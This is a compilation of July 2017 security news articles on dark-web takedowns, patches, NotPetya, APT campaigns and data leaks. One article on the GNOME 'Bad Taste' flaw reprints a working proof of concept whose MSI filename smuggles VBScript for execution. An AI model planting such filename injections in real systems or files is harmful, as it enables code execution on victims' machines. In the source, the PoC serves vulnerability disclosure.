But that new traffic, tens of thousands of users, was unaware that Dutch police had already secretly taken control of Hansa, giving them the ability to identify and track buyers and sellers of illicit goods.

The Hansa market has also now been shut down, said Europol executive director Rob Wainwright.

"By acting together on a global basis the law enforcement community has sent a clear message that we have the means to identify criminality and strike back, even in areas of the Dark Web," Wainwright said.

AlphaBay had been a massive marketplace for illicit goods, 10 times larger than the notorious Silk Road underground cyber marketplace shut down by the US Federal Bureau of Investigation in 2013.

At the time it was shut down, it had more than 250,000 listings for illegal drugs and toxic chemicals, according to the US Justice Department.

It also had 100,000 advertisements for guns, stolen and fraudulent personal documents, counterfeit goods, malware and computer hacking tools.

The marketplaces operated underground on the Tor network, which allows anonymity for users.

With the takedown of AlphaBay and Hansa, authorities said they have frozen millions of dollars worth of cryptocurrencies like Bitcoin used to settle online transactions without the buyers and sellers being identified.

They also seized from Cazes and his wife millions of dollars in currency, luxury cars, and homes in four countries, including a hotel he owned in Thailand.

Wainwright said the investigation had resulted in the identification of numerous organized crime figures and that intelligence leads have been distributed to law enforcement in 37 countries around the world.

"This operation is an example of the improving concerted ability of law enforcement to strike against criminals, even on the dark net," he said. "This coordinated hit against these two marketplaces is just a taste of what is to come in the future."


Apple Patches Vulnerabilities Across All Platforms

20.7.2017 securityweek Vulnerebility  Apple

Apple this week released security patches for all four of its operating systems to resolve tens of security bugs in each of them.

The tech giant addressed 37 vulnerabilities with the release of macOS Sierra 10.12.6 (and Security Update 2017-003 El Capitan and Security Update 2017-003 Yosemite). The vast majority of the issues could result in arbitrary code execution. Impacted components include audio, Bluetooth, contacts, Intel graphics driver, kernel, libarchive, and libxml2, Apple reveals.

The release of iOS 10.3.3 adressed 47 vulnerabilities, many allowing for arbitrary code execution and some for unexpected application termination or information disclosure. WebKit was the most affected component, with over 20 bugs squashed in it. Kernel, Safari, messages, contacts, libarchive, and libxml2 were also among the affected components.

Tracked as CVE-2017-9417 and affecting Broadcom's BCM4354, 4358, and 4359 chips, one of the vulnerabilities could allow an attacker within range to execute arbitrary code on the Wi-Fi chip. Because said chips are used in various smartphones, including devices from HTC, LG, and Samsung, Google too addressed the issue with its latest Android patches.

Apple addressed 16 security flaws with the release of watchOS 3.2.3, including CVE-2017-9417. Kernel was affected the most, with 9 bugs resolved in it. Contacts, IOUSBFamily, libarchive, libxml2, libxpc, messages, and Wi-Fi were also impacted. These vulnerabilities could result in arbitrary code execution, unexpected application termination, information disclosure, or an app’s ability to read restricted memory.

Apple's tvOS 10.2.2 resolves 38 bugs, most of which affect WebKit and Kernel (they were addressed in iOS and watchOS as well). Most of these issues could lead to arbitrary code execution, in some cases with elevated privileges (kernel or system), Apple notes in its advisory.

Apple also released Safari 10.1.2 this week, addressing a bug in Safari Printing and 24 issues in WebKit or related to it. iTunes 12.6.2 for Windows patches 23 security issues (one in iTunes, another in libxml2, and 21 in WebKit), while iCloud for Windows 6.2.2 resolves 22 vulnerabilities (one in libxml2 and 21 in WebKit).


Tor Offers $4,000 Per Flaw in Public Bug Bounty Program

20.7.2017 securityweek Security

Tor launches bug bounty program

The Tor Project announced on Thursday the launch of a public bug bounty program. Researchers can earn thousands of dollars if they find serious vulnerabilities in the anonymity network.

The Tor Project first announced its intention to launch a bug bounty program in late December 2015. A private program was launched in January 2016 and bounty hunters managed to find three denial-of-service (DoS) flaws, including two out-of-bounds (OOB) read and one infinite loop issues, and four memory corruption vulnerabilities that have been described as “edge-case.”

Now, with support from the Open Technology Fund, Tor has launched a public bug bounty program on the HackerOne platform.

The organization is looking for vulnerabilities in the Tor network daemon and Tor Browser, including local privilege escalation, remote code execution, unauthorized access of user data, and attack methods that can be used to obtain crypto data on relays or clients.

Researchers can earn between $2,000 and $4,000 for high severity bugs. Medium severity vulnerabilities are worth between $500 and $2,000, while low severity issues will be rewarded with a minimum of $100. Even less severe problems will be rewarded with a t-shirt, stickers and a mention in Tor’s hall of fame. On its bug bounty page, the Tor Project provides examples for each category of vulnerabilities, including with CVE references.

Vulnerabilities affecting third-party libraries used by Tor can also earn between $500 and $2,000, but libraries covered by other bug bounty programs, such as OpenSSL, have been excluded.

“Tor users around the globe, including human rights defenders, activists, lawyers, and researchers, rely on the safety and security of our software to be anonymous online. Help us protect them and keep them safe from surveillance, tracking, and attacks,” said Georg Koppen, a longtime Tor browser developer.

Tor first announced its intention to launch a bug bounty program after a team of researchers from Carnegie Mellon University helped the FBI unmask users of the anonymity network by creating more than a hundred new relays on the network. The Tor Project claimed at the time that the U.S. government had paid the university at least $1 million to carry out the attack.


Firms Unite to Hunt Threats From Network to Endpoint

20.7.2017 securityweek Security

Network and Endpoint Threat Hunters Corvil and Endgame Combine to Provide Pan-Infrastructure Detection and Response

Two threat hunting and detection companies have integrated their products to give greater visibility and protection across the entire infrastructure. Corvil, with expertise in real-time traffic analysis, and Endgame, with expertise in endpoint protection, can now share threat intelligence between the two platforms with a single click.

"The challenge today between endpoint security and network security," explains David Murray, Corvil chief business development officer, "is that they often tend to exist each in their own domain, when one of infosecurity's multipliers is the ability to integrate and be able to track a threat across the network and into the endpoint."

Organizations may have dozens of different security tools and technologies that do not adequately talk to each other. "The result," says Murray, "is that security analysts remain horribly overburdened." Training existing staff to a higher skill-set, or buying in new experts is often not an option. "It is important," he continued, to take the intelligence and analytics that we provide and seamlessly integrate it with other security technologies. We've already done this with Cisco's Tetration. Today we're announcing two further integrations, one with Endgame and the other with Palo Alto Networks, that enable comprehensive protection from the perimeter through the network and inclusive of the endpoint."

Endgame's endpoint threat detection platform can see endpoint threats at the kernel level and in memory, but can lose visibility into the path of anomalous communication that leaves the endpoint. "Similarly," adds Murray, "anything that tries to compromise an individual host or server endpoint of any kind has to travel over the network in order to get there. By sharing intelligence back and forth between our two platforms, we're able to provide a stronger fabric for protection."

Both Corvil and Endgame share similar philosophies and have a history of protecting some of the most sensitive and attacked infrastructures: Corvil in fintech, and Endgame in defense and military. Both believe organizations cannot wait to be breached but need to take an aggressive threat-hunting approach to network defense.

"The techniques attackers use today are increasingly aggressive, complex, and difficult to detect," comments Nate Fick, Endgame's CEO. "Security solutions that only identify customer breaches after damage and loss are no longer acceptable. Corvil shares our philosophy of direct, aggressive protection. Extending the visibility, we can offer customers across the network and endpoint represents the most comprehensive solution available on the market."

Both also share the view that their role is to make hunting and protection as easy as possible for the analyst, reducing the customer's reliance on expensive expert analysts. Each has their own virtual assistant. Corvil's Cara automatically generates daily risk reports, while Endgame's Artemis is a natural-language Siri-like assistant that will answer questions like, "What is suspicious on my network today?"

"One of the things we're planning to release in the second phase of integration," Murray told SecurityWeek, "is to extend the capabilities of our respective virtual experts to give both platforms the ability to stretch much further across an attack lifecycle, and be able to triangulate information to make a more active and more precise response."

Speed in detecting a threat loses its value if there is a subsequent delay in responding to that threat. Both platforms have their own built-in response capabilities. Corvil also integrates with Palo Alto Networks (PAN) firewalls. Where PAN micro-segmentation is employed, Corvil can initiate a firewall road block to PAN to isolate the risky host. Similarly, Endgame, has its own more surgical disruptions it can introduce within the host or endpoint.

"Let's say Corvil detects a risky host," explains Murray. "With one click the analyst can see the result in Endgame, and they can trigger an action right there. Similarly, if someone is working in Endgame and has questions about the downstream communication of a suspicious host, the analyst can bring up information about the communication in Endgame and then click to Corvil to further investigate it. Corvil could initiate a firewall road block in PAN directly from Corvil. Corvil can determine the source of the bad behavior and block it so that it can no longer communicate through the firewall. Alternatively, there could be a more surgical disruption within the source through Endgame."

"By combining Endgame's heritage in protecting against nation-state adversaries with Corvil's longstanding leadership in safeguarding algorithmic businesses," says Murray, "we, uniquely, provide critical capabilities that our customers across industries require. Today's partnership with Endgame enables us to cover a wider spectrum of an organization's infrastructure and empower today's overburdened security teams."

The Corvil/Endgame integration is available from today to early adopter customers


FedEx May Have Permanently Lost Data Encrypted by NotPetya

20.7.2017 securityweek Ransomware

FedEx-owned international delivery services company TNT Express is still working on restoring systems hit last month by the destructive NotPetya malware attack, but some business data may never be recovered, FedEx said in a Securities and Exchange Commission (SEC) filing this week.

NotPetya (also known as Nyetya, PetrWrap, exPetr, GoldenEye, and Diskcoder.C) infected tens of thousands of systems, including ones belonging to major organizations, in more than 65 countries. Many of the victims were located in Ukraine, which is not surprising considering that the main attack vector was the update system of M.E. Doc, an accounting tool developed by Kiev-based tax software firm Intellect Service.

The infosec community initially believed NotPetya was a piece of ransomware, similar to WannaCry. However, closer analysis revealed that it was actually a wiper and it was unlikely that victims could recover their files, even if they paid the ransom.

TNT Express, whose Ukraine office uses the compromised tax software, was hit hard by the attack, which led to FedEx temporarily suspending trading of its shares on the New York Stock Exchange. It’s worth noting that FedEx was also impacted by the WannaCry attack.

In its annual report with the SEC on Form 10-K for fiscal year 2017, FedEx said the attack did not affect any other of its companies. While there is no evidence that any data was stolen by malicious actors from TNT systems, the attack had a significant impact on the company’s operations and communications.

A majority of TNT services are available by now, but FedEx informed customers of possible delays in service and invoicing due to the use of manual processes. The company is working on restoring critical systems, including operational, finance, back-office and secondary business systems, but it’s unclear how long the process will take.

Furthermore, FedEx believes it’s “reasonably possible” that TNT will not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

“Given the recent timing and magnitude of the attack, in addition to our initial focus on restoring TNT operations and customer service functions, we are still evaluating the financial impact of the attack, but it is likely that it will be material,” FedEx said in a press statement. “We do not have cyber or other insurance in place that covers this attack. Although we cannot currently quantify the amounts, we have experienced loss of revenue due to decreased volumes at TNT and incremental costs associated with the implementation of contingency plans and the remediation of affected systems.”

FedEx is not the only shipping company hit by NotPetya. Danish shipping giant A.P. Moller-Maersk also had its systems infected, which prevented it from accepting new orders. Maersk-owned APM Terminals, a global port and cargo inland services provider, was also affected, causing problems at major ports in the United States and Europe.

According to Reuters, Maersk admitted that its antivirus software was not effective against the NotPetya malware, and the company now claims to have implemented additional security measures to prevent future incidents.


Avast Acquires CCleaner Developer Piriform

20.7.2017 securityweek IT

Antivirus firm Avast announced on Wednesday the acquisition of Piriform, a London, UK-based company that develops the popular cleaning and optimization tool CCleaner.

While the Piriform staff will join Avast’s consumer business unit, the antivirus company wants to keep Piriform products separate from its current system optimization offering, which includes Avast Cleanup and AVG TuneUp. Avast acquired AVG last year.

The Piriform acquisition will broaden Avast’s presence in London and the companies say they will combine their expertise to deliver even better products.

CCleaner is used by more than 130 million people worldwide, including 15 million Android device users. Avast CEO Vince Steckler believes the CCleaner brand fits his company very well as they both provide high-quality free products.

Steckler also pointed out that both Avast and Piriform have strong and loyal communities whose members provide product feedback and help each other.

“I’ve seen Piriform grow from a bedroom-based hobby to a real business with billions of downloads, millions of users and a worldwide fan base. Our objective, which is to create world-class software tools that fix real world problems, has made the business what it is today,” said Lindsey Whelan, CEO of Piriform.

“We’re pleased to become part of a company which shares this objective because it means together, we can combine our expertise to deliver even better software to the people that matter most: our users,” Whelan added.

The financial terms of the deal have not been disclosed.


New CyberX Technology Predicts ICS Attack Vectors

20.7.2017 securityweek ICS

Industrial cybersecurity and threat intelligence firm CyberX announced on Thursday the availability of a new simulation technology that allows organizations to predict breach and attack vectors on their networks.

The new industrial control systems (ICS) security service, named ICS Attack Vector Prediction, leverages proprietary analytics to continuously predict possible attack avenues and help organizations prevent breaches.

The solution provides a visual representation of all possible attack chains targeting critical assets in the operational technology (OT) network. Scenarios are ranked based on the level of risk to help security teams prioritize mitigation.

Cybersecurity personnel are provided detailed mitigation recommendations for each vulnerability. This can include patching Windows devices, upgrading vulnerable PLC firmware, and disabling unnecessary or unmanaged remote access methods.

CyberX's in-house ICS security experts can also advise organizations on how to devise the most efficient and effective mitigation strategies, especially in large and globally-distributed organizations in sectors such as manufacturing, pharmaceuticals, chemicals, and oil and gas.

Related: Learn More at SecurityWeek's 2017 ICS Cyber Security Conference

Security teams can easily simulate the effects of each mitigation action. For example, they can simulate patching or isolating a device in order to determine if that eliminates the risk posed to important systems.

CyberX ICS Attack Vector Prediction

Scanning OT networks is not as easy as scanning IT networks because invasive actions can cause downtime. In order to prevent disruption to the customer’s systems, CyberX says its product simulates attack vectors by using agentless asset discovery and vulnerability assessment technology that combines a deep understanding of industrial systems and non-invasive traffic analysis.

The Attack Vector Prediction technology is available now as part of the base CyberX platform at no additional charge to existing customers. The CyberX platform is priced based on the number of monitored appliances, both physical or virtual.

With the addition of the attack prediction technology to its offering, CyberX says it addresses all four requirements outlined in Gartner’s Adaptive Security Architecture framework: prediction, prevention, detection and response.


Critical Code Injection Flaw In Gnome File Manager Leaves Linux Users Open to Hacking
20.7.2017 thehackernews 
Vulnerebility

A security researcher has discovered a code injection vulnerability in the thumbnail handler component of GNOME Files file manager that could allow hackers to execute malicious code on targeted Linux machines.
Dubbed Bad Taste, the vulnerability (CVE-2017-11421) was discovered by German researcher Nils Dagsson Moskopp, who also released proof-of-concept code on his blog to demonstrate the vulnerability.
The code injection vulnerability resides in "gnome-exe-thumbnailer" — a tool to generate thumbnails from Windows executable files (.exe/.msi/.dll/.lnk) for GNOME, which requires users to have Wine application installed on their systems to open it.
Those who are unaware, Wine is a free and open-source software that allows Windows applications to run on the Linux operating system.
Moskopp discovered that while navigating to a directory containing the .msi file, GNOME Files takes the filename as an executable input and run it in order to create an image thumbnail.
For successful exploitation of the vulnerability, an attacker can send a crafted Windows installer (MSI) file with malicious VBScript code in its filename, which if downloaded on a vulnerable system would compromise the machine without further user interaction.
"Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine," Moskopp explains while demonstrating his PoC.
"The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution."
The flaw can be exploited by potential hackers using other attack vectors as well, for example, by directly inserting a USB-drive with a malicious file stored on it, or delivering the malicious file via drive-by-downloads.
How to Protect Yourself from Bad Taste
Moskopp reported the vulnerability to the GNOME Project and the Debian Project. Both of them patched the vulnerability in the gnome-exe-thumbnailer file.
The vulnerability affects gnome-exe-thumbnailer before 0.9.5 version. So, if you run a Linux OS with the GNOME desktop, check for updates immediately before you become affected by this critical vulnerability.
Meanwhile, Moskopp also advised users to:
Delete all files in /usr/share/thumbnailers.
Do not use GNOME Files.
Uninstall any software that facilitates automatically execution of filenames as code.
Moskopp also advised developers to not use "bug-ridden ad-hoc parsers" to parse files, to "fully recognise inputs before processing them," and to use unparsers, instead of templates.


CrowdStrike, Dragos Partner to Deliver Comprehensive ICS Security Services

20.7.2017 securityweek ICS

Cloud-based endpoint security firm CrowdStrike and Dragos, a company that specializes in protecting industrial control systems (ICS), announced on Tuesday a strategic partnership whose goal is to provide comprehensive cybersecurity services.

Joint customers will benefit from a combination of CrowdStrike’s assessment, preparedness and incident response services and Dragos’ expertise in protecting ICS. The offering is designed to help critical infrastructure and other organizations secure their systems against sophisticated threats.

Customers will be provided proactive enterprise security services through CrowdStrike’s Falcon platform, compilation and correlation of ICS security events via the Dragos platform, and expertise for preventing, assessing and responding to ICS incidents.

The partnership will also offer comprehensive enterprise and industry intelligence, and improved awareness, visibility and protection against threats that pose a serious risk to organizations using both networked endpoints and industrial devices.

“At CrowdStrike, we track a wide array of adversaries going after critical infrastructure with incredibly sophisticated attack methods and tools. In order to stop these breaches, it’s important to combine domain knowledge of the industrial threat landscape, actionable intelligence, advanced security services and endpoint protection technology,” said Thomas Etheridge, vice president of services at CrowdStrike. “We are thrilled to partner with Dragos, a company that brings unrivalled expertise in ICS/SCADA systems to offer joint customers improved security planning, awareness, visibility, and exceptionally fast response to incidents.”

“Current security solutions are blind to how adversaries breach industrial systems and disrupt critical operations. Together, CrowdStrike and Dragos leverage proven human expertise, adversary intelligence and unrivaled technology to uniquely equip our customers with a full understanding of the enterprise and industrial threat landscape,” said Ben Miller, director of Threat Operations at Dragos.


'DarkHotel' APT Uses New Methods to Target Politicians

20.7.2017 securityweek APT

The DarkHotel threat group has been using some new methods in attacks aimed at government employees with an interest in North Korea, according to a report published this week by security firm Bitdefender.

The activities of the DarkHotel advanced persistent threat (APT) actor came to light in November 2014, when Kaspersky published a report detailing a sophisticated cyber espionage campaign targeting business travelers in the Asia-Pacific region. The group has been around for nearly a decade and some researchers believe its members are Korean speakers.

The attackers targeted their victims using several methods, including through their hotel’s Wi-Fi, zero-day exploits and peer-to-peer (P2P) file sharing websites. Nearly one year later, the threat group was observed using new attack techniques and an exploit leaked from Italian spyware maker Hacking Team.

DarkHotel victims have been spotted in several countries, including North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, Taiwan, China, the United States, India, Mozambique, Indonesia and Germany. Up until recently, the attacks appeared to focus on company executives, researchers and development personnel from sectors such as defense industrial base, military, energy, government, NGOs, electronics manufacturing, pharmaceutical, and medical.

In more recent DarkHotel attacks it has dubbed “Inexsmar,” security firm Bitdefender said the hackers targeted political figures, and they appeared to be using some new methods.

Bitdefender’s analysis is based on samples from September 2016. The initial Trojan downloader, delivered via phishing emails, collects information on the infected device and sends it back to its command and control (C&C) server. If the compromised system meets requirements (i.e. it belongs to an individual who is of interest), the first stage DarkHotel downloader, disguised as a component of OpenSSL, is fetched.

In the meantime, in an effort to avoid raising suspicion, the malware opens a document titled “Pyongyang e-mail lists - September 2016,” which provides a list of email contacts for various organizations in North Korea’s capital city.

If the system profile does not match what the attackers are looking for, the C&C server returns a “fail” string and the attack stops. If the attack continues, a second payload is retrieved.

When Bitdefender analyzed the malware samples, the C&C server was offline, making it impossible to know exactly who the victims were and how much damage was caused. However, Bitdefender’s Bogdan Botezatu told SecurityWeek that, based on the structure of the phishing message, the intended targets are most likely individuals working for governments or state institutions who have an interest in the political situation in North Korea.

Experts believe that the use of social engineering and a multi-stage downloader is an improvement compared to the direct use of exploits as it gives the attackers more flexibility in malware distribution and ensures that the Trojan remains up to date.


A bug in Gnome pic parser can be exploited to run malicious VBScripts
20.7.2017 securityaffairs 
Exploit  Virus

A bug in your image thumbnailer could represent a new attack vector for hackers that can exploit it for script injection.
Another day, another bug in a popular application. A bug in your image thumbnailer could represent a new attack vector for hackers that can exploit it for script injection.

To create image thumbnails, Gnome Files allows users providing filenames as an executable input.

The flaw was detailed by the researchers Nils Dagsson Moskopp who provided useful suggestions to avoid being hacked.

“Thumbnail generation for MSI files in GNOME Files executes arbitrary VBScript.” states Moskopp.

“Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code”.

Dagsson Moskopp published a PoC code leveraging Wine to execute VBScript. He tricks Gnome Files into creating an MSI file called badtaste.txt.

gnome thumbnailer

Create MSI Files

Create a file named poc.xml with the following content:
<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>
Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
Trigger Execution
Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.

“Whenever an icon for a Microsoft Windows executable (EXE), installer (MSI), library (DLL), or shortcut (LNK) should be shown, Gnome Files calls /usr/bin/gnome-exe–thumbnailer to either extract an embedded icon from the file in question or deliver a fallback image for the appropriate filetype.” explained the expert.

The expert highlighted that the problem is triggered due to the presence of just one line of code in /usr/bin/gnome-exe-thumbnailer:

DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\${TEMPFILE1##*/}.vbs 2>/dev/null \
“Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine. The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution.” Dagsson Moskopp added.

In order to avoid problems, Dagsson Moskopp suggests developers should not use “ad-hoc parsers” to parse files, should “fully recognise inputs before processing them”, and should use unparsers.

Below the remedy suggestions for both users and developers:

Remedy (for users)

“Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code.”
Remedy (for developers)“Do not parse files with bug-ridden ad-hoc parsers. Fully recognize inputs before processing them. Do not use templates, use unparsers instead. Read about LANGSEC.”


DDoS Tools availability Online, a worrisome trend
20.7.2017 securityaffairs 
Attack

Experts warn of an increased availability of DDoS tools online, many wannabe hackers download and use them without awareness on consequences.
As cyber crime reaches new levels with new malware & viruses being realized online on a daily basis it also becomes apparent that the increase in DDoS tools that require no apparent skills to use them, just providing the IP address it is possible to launch the attack. These tools are becoming more and more available on the Internet.

We are all aware of the effects of a DDOS attack can have on a company not only rendering their website inaccessible, but also causing a loss in online revenue & sales.

With the release of such applications comes the added threat of users knowingly allowing backdoors to their computer systems to allow the creators access to your device to continue attacks in your absence. Not only does a back door in a system allow the distributor access but also anyone else who finds the vulnerability.

The main concern is that in general many young people are downloading and using theses tools but also the fact that they are told under false illusions to use them and believe they are safe in taking part in denial of service attacks on high profile sites including government domains causing sites to go offline and un reachable.

It’s very important nowadays to be aware of what your children are downloading on the Internet and that you only install applications that are from verified software companies and scanned before install or execution.

These groups are spreading their vulnerable applications through more and more blatant means on mainstream social media were most younger generations reside on the web.

( I am not going to advise on how to use denial of service and stay anonymous but I can assure the application you installed is not protecting you it’s infecting your system. )

Please see the below DDoS tools & applications found by our cyber research division at Frontline Cyber Security Ltd in a short search over some popular social media sites (Mention No Names). We were seeing how easily accessible DDOS tools are to the general web user.

Distributed denial of service application’s found ( Details removed of download links please contact us if you are a researcher / analyst. )

LOIC RedCult Edition – RiskwareAgent – MD5 609db4b9154f9aee29a5ceb775bec655
RedCult Doser – Loic.7 – MD5 6d0abacacd4393f9b3e30b2ed3be316e
RC Doors – Malware.SDi.5EDF – MD5 b1465ff2711b3cc9c4c8faf414354e7d
exe – Win32.DarkKomet – MD5 606aeb40c65070d234e1617d1ab257ff
ddos_android – Android.SpyAgent – MD5 c99ccf4d61cefa985d94009ad34f697f
Here is an image of the Android application running fill out a few boxes and click send.

DDoS tools online

We also obtained a list of targets theses applications were released to attack and have also managed to collect screen shots of the tools in use against government sites.

Below are some images of the application being used in what appears to be one of many Anonymous Operations in this case #OpIsrael.

We have a list of servers the tool was designed to attack but are unable to post it at this time.


The below image shows the application being shared and distributed


In regards to the above DDoS tools, the relevant authorities have been notified and are assisting in having them removed.


Black Hat is coming and with it a good reason to update your “Broadcom-based” devices
20.7.2017 securityaffairs  Mobil

BroadPwn potentially expose to hack millions of Android devices using Broadcom Wi-Fi Chip, update your “Broadcom-based” devices.
Black Hat 2017 is debuting in 3 days and with it a potential concern to most of us. It turns out that one of the conference presentations, entitled BROADPWN: REMOTELY COMPROMISING ANDROID AND IOS VIA A BUG IN BROADCOM’S WI-FI CHIPSETS [1], will detail how Broadcom BCM43xx Wi-Fi chipsets can be exploited to achieve full code execution on the compromised device without user interaction.

“An attacker within range may be able to execute arbitrary code on the Wi-Fi chip”, says Apple about this vulnerability (CVE-2017–9417) in today’s security bulletin [2].

BroadPWN Broadcom flaw

Besides Apple, those chipsets are present on most smartphone devices like HTC, LG, Nexus and most Samsung models as well. Make sure to have this vulnerability fixed on all your devices — especially if you are planning to be in Las Vegas next week.

References
[1] https://www.blackhat.com/us-17/briefings.html#broadpwn-remotely-compromising-android-and-ios-via-a-bug-in-broadcoms-wi-fi-chipsets
[2] https://support.apple.com/pt-br/HT207923


Google Warns Users of Potentially Risky Web Apps

19.7.2017 securityweek  Security

Google is taking another step to better protect users from malicious third-party web applications: it is now warning users of newly created web apps and Apps Scripts that are pending verification.

The move follows a series of similar protective measures the Internet giant announced earlier this year, after many of its users were hit by a phishing attack where a rogue app was found impersonating Google Docs. To prevent similar incidents, the company tightened OAuth rules and also started scrutinizing new web apps that request user data.

The new warning screen will be accompanied by changes expected to improve the developer experience, the company says, adding that the verification process and the new warnings will expand to existing apps in the coming months.

The new “unverified app” screen that users will see when accessing newly created web applications and Apps Scripts that require verification will replace the “error” page that has been served to developers and users over the past several months. The screen will appear before users are taken to the permissions consent screen, thus only informing users of the app not being yet verified.

Through these new notices, users will be automatically informed if they may be at risk, thus helping them make more informed decisions to keep their information safe. The testing and developing of applications should also be simplified.

“This will help reduce the risk of user data being phished by bad actors. This new notice will also help developers test their apps more easily,” Naveen Agarwal, Identity team, and Wesley Chun, Developer Advocate, G Suite, note in a blog post.

Users have the option to dismiss the alert, which allows developers to test applications without going through the OAuth client verification process first. Google has published a series of steps in a help center article to provide information on how to begin the verification process to remove the interstitial and prepare their app for launch.

The same protections are being applied to Apps Script beginning this week, meaning that all new Apps Scripts requesting OAuth access to data from users in other domains may also get the "unverified app" alert. Additional information was published in a verification documentation page.

“Apps Script is proactively protecting users from abusive apps in other ways as well. Users will see new cautionary language reminding them to ‘consider whether you trust’ an application before granting OAuth access, as well as a banner identifying web pages and forms created by other users,” Agarwal and Chun say.

Next, Google is planning an expansion of the verification process to existing apps as well, meaning that developers of some current apps may have to go through the verification flow. To ensure no issue will hinder the transition, developers should make sure their contact information is up-to-date.

“In the Google Cloud Console, developers should ensure that the appropriate and monitored accounts are granted either the project owner or billing account admin IAM role. In the API manager, developers should ensure that their OAuth consent screen configuration is accurate and up-to-date,” Google says.

The company has published help center articles to provide detailed information on granting IAM roles and on configuring the consent screen.


Organizations Slow to Patch Critical Memcached Flaws

19.7.2017 securityweek  Vulnerebility

Tens of Thousands of Internet-Exposed Memcached Servers Are Vulnerable to Attacks

Tens of thousands of servers running Memcached are exposed to the Internet and affected by several critical vulnerabilities disclosed last year by Cisco’s Talos intelligence and research group.

In late October 2016, Talos published an advisory describing three serious flaws affecting Memcached, an open source, high performance distributed memory caching system used to speed up dynamic web apps by reducing the database load.

The vulnerabilities, tracked as CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706, allow a remote attacker to execute arbitrary code on vulnerable systems by sending specially crafted Memcached commands. The flaws can also be leveraged to obtain sensitive data that could allow an attacker to bypass exploit mitigations.

The security holes were patched by Memcached developers before Talos disclosed its findings. A few months later, in late February and early March 2017, researchers conducted Internet scans to find out how many organizations had patched their installations.

The scans uncovered a total of more than 107,000 servers accessible over the Internet and nearly 80 percent of them, or roughly 85,000 servers, were still vulnerable. Furthermore, only approximately 22 percent of the servers, or roughly 24,000, required authentication.

Nearly 30,000 of the vulnerable servers were located in the United States, followed by China (17,000), the United Kingdom (4,700), France (3,200), Germany (3,000), Japan (3,000), the Netherlands (2,600), India (2,500) and Russia (2,300).

After completing the scans, Cisco obtained contact email addresses for all the IP addresses associated with the vulnerable servers and attempted to notify affected organizations.

Six months later, researchers conducted another scan, but the situation improved only slightly, with roughly 10 percent of systems patched since the previous analysis. However, the number of servers requiring authentication dropped to 18,000, or 17 percent of the total.

Interestingly, researchers noticed that more than 28,000 of the previously discovered servers were no longer online. However, since the total number of Internet-facing installations remained the same, experts determined that some servers either changed their IPs or organizations had been deploying new systems with vulnerable versions of Memcached.

Talos warned that these vulnerable Memcached installations could be targeted in ransom attacks similar to the ones that hit MongoDB databases in early 2017. While Memcached is not a database, it can still contain sensitive information and disrupting it could have a negative impact on other dependent services.

“The severity of these types of vulnerabilities cannot be understated,” experts warned. “These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely.”

The number of Memcached instances accessible from the Internet has remained fairly constant over the past years. An analysis conducted in August 2015 uncovered 118,000 Memcached instances exposing 11 terabytes of data.


Millions of Dow Jones Customer Records Exposed Online

19.7.2017 securityweek  Incindent

American news and financial information firm Dow Jones & Company inadvertently exposed the details of millions of its customers. The data was found online by researchers in an Amazon Web Services (AWS) S3 bucket that had not been configured correctly.

Chris Vickery of cyber resilience firm UpGuard discovered on May 30 an AWS data repository named “dj-skynet” that appeared to contain the details of 4.4 million Dow Jones customers. Dow Jones disabled access to the files only on June 6.

The files included names, customer IDs, physical addresses, subscription details, the last four digits of credit cards and, in some cases, phone numbers belonging to individuals who subscribed to Dow Jones publications such as The Wall Street Journal and Barron’s.

One of the exposed files stored 1.6 million entries for Dow Jones Risk and Compliance, a risk management and regulatory compliance service for financial institutions.

According to UpGuard, the data was accessible because Dow Jones employees had configured the repository’s permissions to allow access to anyone with an AWS account. There are over one million Amazon cloud users and anyone can register an account for free.

Dow Jones confirmed the data leak, but claimed only 2.2 million of its customers were affected, not 4.4 million as UpGuard claims. The security firm has admitted that there could be some duplicate entries.

It’s unclear if affected customers will be notified, but in a statement to The Wall Street Journal the company downplayed the incident, arguing that there is no evidence the data was taken by anyone else and the exposed information does not pose a significant risk to users.

UpGuard disagrees and points out that the data could be highly valuable to malicious actors for phishing and other social engineering schemes.

In recent weeks, the security firm reported finding exposed databases storing data belonging to the U.S. National Geospatial-Intelligence Agency (NGA), American voters, and Verizon customers. Unprotected Amazon S3 buckets were involved in all incidents.

“Yet another demonstration of how services such as AWS are missing basic steps that ensure their data and services are configured in a secure fashion,” Bitglass CEO Rich Campagna told SecurityWeek.

“It’s seems like a no-brainer to implement data-centric security tools on any sensitive information that could get out to the public. This approach could ensure that cloud services deny unauthorized access, and organizations could take it one step further and encrypt sensitive data at rest,” Campagna added. “Companies like Dow Jones, Verizon and anyone else using the public cloud for their infrastructure can easily enforce policies that require internal teams and third-parties to adequately protect any customer data that touches the cloud.”


EternalSynergy-Based Exploit Targets Recent Windows Versions

19.7.2017 securityweek  Exploit

A security researcher has devised an EternalSynergy-based exploit that can compromise versions of Windows newer than Windows 8.

EternalSynergy is one of several exploits allegedly stolen by the hacker group calling themselves the Shadow Brokers from the National Security Agency (NSA)-linked Equation Group. The exploit was made public in April along with several other hacking tools, one month after Microsoft released patches for them.

In May, a security researcher included EternalSynergy and six other NSA-linked hacking tools (EternalBlue, EternalChampion, EternalRomance, DoublePulsar, Architouch, and Smbtouch) in a network worm called EternalRocks. The tool was pulled weeks later to prevent abuse.

